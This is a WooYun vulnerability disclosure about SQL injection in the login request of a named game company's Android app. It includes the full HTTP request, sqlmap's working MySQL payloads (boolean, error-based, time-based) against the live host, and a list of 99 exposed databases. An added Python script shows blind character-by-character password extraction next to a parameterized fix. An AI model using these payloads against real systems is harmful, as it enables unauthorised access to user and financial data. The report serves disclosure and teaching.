WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-11-12: Details were sent to the vendor and are awaiting the vendor's handling.
2015-11-25: The vendor has actively ignored the vulnerability; details are disclosed to the public.

As in the title.

Vulnerable app (Android version):
http://mobile.ztgame.com/mobile/index.php

After installing the Android app, the login request issued at startup contains a SQL injection.
POST /mobileapp/index.php HTTP/1.1
Host: mobile.ztgame.com
Connection: keep-alive
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://mobile.ztgame.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://mobile.ztgame.com/mobileapp/index.php
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3

act=setsubmit&username=admin&password=123456&openId=
Every injection technique works (sqlmap output, the injection point is the username parameter):

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=setsubmit&username=admin' RLIKE (SELECT (CASE WHEN (1364=1364) THEN 0x61646d696e ELSE 0x28 END)) AND 'zBPi'='zBPi&password=123456&openId=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=setsubmit&username=admin' AND (SELECT 3506 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(3506=3506,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CTYM'='CTYM&password=123456&openId=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=setsubmit&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))umgI) AND 'IDKo'='IDKo&password=123456&openId=
---
[05:25:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.4.4
back-end DBMS: MySQL 5.0
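The boolean-based blind technique above works because the application's response differs depending on whether the injected condition is true or false, which turns the login form into a yes/no oracle that sqlmap uses to read data one character at a time. The script below reproduces that oracle offline against SQLite and puts the vulnerable string-built query next to its parameterized fix. It is an added example for this report, not code from the original page or from mobile.ztgame.com: the login SQL, the table layout and the sample account are assumptions (the report does not show the handler's query), and because sqlmap's payloads use MySQL-only functions (RLIKE, SLEEP), the probes here are SQLite-compatible equivalents of the same quote-close / AND condition / quote-reopen trick.

```python
"""Boolean-based blind SQL injection reproduced offline (added example).

Assumptions, none of which come from the report: the handler looks the
user up by username alone, the table is `users(username, password)`,
and the admin secret is the made-up value below.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data for the demonstration only.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Same bug class as the report: the POST parameter is pasted into the
    # SQL text, so a quote in it ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, username FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    # Hardened form: the value is bound as a parameter and is never parsed
    # as SQL, whatever quotes or keywords it contains.
    sql = "SELECT id, username FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchall()


def probe(lookup, conn: sqlite3.Connection, condition: str) -> bool:
    # Shape of sqlmap's boolean payload: close the quote, AND a condition,
    # then reopen a quote so the application's trailing quote still parses.
    payload = f"admin' AND ({condition}) AND 'a'='a"
    return len(lookup(conn, payload)) > 0


def is_injectable(lookup, conn: sqlite3.Connection) -> bool:
    # The oracle exists if a true condition and a false one give
    # different results; a safe lookup returns nothing for both.
    return probe(lookup, conn, "1=1") and not probe(lookup, conn, "1=2")


def extract_password(lookup, conn: sqlite3.Connection, max_len: int = 32) -> str:
    # Blind extraction: recover the admin secret one character per round
    # of yes/no probes, exactly what sqlmap automates with a wider alphabet.
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            cond = (
                f"(SELECT substr(password,{pos},1) FROM users "
                f"WHERE username='admin')='{ch}'"
            )
            if probe(lookup, conn, cond):
                found = ch
                break
        if found is None:  # past the end of the value, or a char not in alphabet
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("string-built query injectable:", is_injectable(lookup_vulnerable, db))
    print("recovered via blind oracle:   ", extract_password(lookup_vulnerable, db))
    print("parameterized query injectable:", is_injectable(lookup_safe, db))
```

The point to take from the safe variant is that no output-side "filtering" is needed for it to hold: the identical payload is simply a username that does not exist. Escaping or blacklisting keywords in the vulnerable variant would still leave the query text under attacker influence.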
99 databases are reachable from this injection point; how important the data is, you know better than I do:

available databases [99]:
[*] a_consume_day
[*] a_ly360_consume_day
[*] a_ptaidata_web
[*] a_zoneinfo_hour
[*] action_rpt_god
[*] action_rpt_hs
[*] action_rpt_pla
[*] action_rpt_xxsj
[*] action_rpt_ztgame
[*] action_rpt_ztnew
[*] all_zoneInfo
[*] all_zoneInfo_hour
[*] anti_fraud_cheat_account
[*] anti_fraud_stat
[*] area_stat_rpt
[*] buy_silver
[*] caiwu_check
[*] caiwu_data_report
[*] cb_rpt
[*] check_ordervsobj
[*] check_up
[*] classify_user_rpt
[*] consume_vip
[*] cs_order
[*] csjz_cb_tmp
[*] csjz_hour_stat
[*] data_node_course_detail
[*] data_node_name_day
[*] db_union_sortlist
[*] dim_tpart_config
[*] dim_zoneinfo_for_xinjian
[*] easy_consume_rpt
[*] finance_dw
[*] finance_lost_reg
[*] GAQ
[*] GAQ1_download
[*] GAQ4_download
[*] GAQ5_download
[*] GAQ6_download
[*] GAQ8_download
[*] GAQ9_download
[*] hbs
[*] hour_computer
[*] hour_computer_back
[*] hour_computer_bak11111
[*] information_schema
[*] jh_sortlist
[*] loading_lost
[*] mail_quick
[*] media_stat
[*] money_monitor
[*] mysql
[*] new_user_rpt
[*] newzone_15index
[*] objkeywords_stat
[*] peng
[*] ptai_stat_219
[*] ptai_stat_report
[*] ptai_stat_report_del
[*] ptai_stat_rpt
[*] realtime_rpt
[*] realtime_rpt_test
[*] realtime_rpt_tmp
[*] remain_rpt
[*] report
[*] resource_manage_system
[*] rpt_client_adcost
[*] rpt_client_ptai_stat
[*] rpt_mobile_conf
[*] rpt_mobile_consume_stat
[*] rpt_mobile_ptai_stat
[*] rpt_mobile_realtime_stat
[*] rpt_mobile_realtime_stat_test
[*] rpt_mobile_user_trace
[*] rpt_mobile_user_trace_test
[*] rpt_must_ptai_stat
[*] rpt_must_user_trace
[*] scb_ws
[*] scb_xxsj
[*] select_db_detail
[*] sobj_stat
[*] sortlist_collect_rpt
[*] stat
[*] stat_analyze
[*] stat_consume
[*] test
[*] transform_rpt
[*] user_analyze
[*] user_analyze_xt
[*] user_analyze_zt2
[*] user_analyze_ztgame
[*] user_center_rpt
[*] user_segmentation_report
[*] vip
[*] vip_xt_obj
[*] vip_zt2_obj
[*] vip_ztgame_obj
[*] xxxx
[*] zoneinfo
My gut tells me the data here is large and important. As a white hat with principles I did not dump any database; you can check the logs. I stopped here. Given how serious the impact is, could this get a Rank of 20?

Suggested fix: filter the input.

Severity: No impact (vendor ignored)
Ignored on: 2015-11-25 06:24
Vulnerability Rank: 15 (WooYun rating)
Vendor comment: none yet